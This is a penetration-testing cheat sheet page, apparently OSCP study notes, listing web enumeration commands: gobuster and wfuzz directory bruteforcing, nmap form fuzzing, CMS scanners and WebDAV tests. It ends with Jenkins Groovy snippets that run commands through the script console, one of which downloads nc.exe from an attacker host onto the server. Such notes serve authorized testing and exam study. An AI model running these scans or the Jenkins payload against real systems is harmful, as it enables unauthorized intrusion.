OSCP
Search…
⌃K

Web Application Directory bruteforcing / fingerprinting

Gobuster

gobuster -u http://ip -w /usr/share/wordlists/dirb/small.txt -s 307,200,204,301,302,403 -x txt,sh,cgi,pl -t 50
gobuster -u http://ip/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -s 307,200,204,301,302,403 -x txt,sh,cgi,pl -t 50
gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 20
gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/quickhits.txt -t 20
gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 20 -x .txt,.php
gobuster -s "200,204,301,302,307,403,500" -w /usr/share/seclists/Discovery/Web_Content/common.txt -u http://
gobuster -s "200,204,301,302,307,403,500" -u http://XXXX -w
gobuster -u http://ip -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 40
Gobuster comprehensive directory busting
gobuster -s 200,204,301,302,307,403 -u iop -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'
Gobuster quick directory busting
gobuster -u ip -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux

Wfuzz

wfuzz -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 400,404,500 http://x.x.x.x/FUZZ
wfuzz -w /usr/share/seclists/Discovery/Web_Content/quickhits.txt --hc 400,404,500 http://x.x.x.x/FUZZ
wfuzz -c -z range,1-65535 --hl=2 http://ip:60000/url.php?path=1 27.0.0.1:FUZZ
wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hh 158607 http://bart.htb/FUZZ
Nmap HTTP Form Fuzzer
nmap --script http-form-fuzzer --script-args 'http-form-fuzzer.targets={1={path=/},2={path=/register.html}}' -p 80 $ip
Robot.txt audit
parsero -u http://X
Banner Grabbing
nc -v ip port
CMSmap
cmsmap.py https://x.x.x.x

Wordpress Scan WpScan

wpscan -u ip/wp/

Drupal Scan

droopescan scan -u $ip

Webdav

Webdav
Test incorrect permissions:
$ cadaver http://$ip
$ davtest http://$ip
Jenkins Script
Jenking groovy code
Testing to see if we have code execution…
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'powershell.exe $PSVERSIONTABLE'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
Nc Upload in Jenkins Server
NC upload in jenkin Server
def process = "powershell -command Invoke-WebRequest 'http://ip/nc.exe' -OutFile nc.exe".execute();
println("${process.text}");
Previous
SMB Enumeration
Next
Port & Services Scanning
Last modified 2yr ago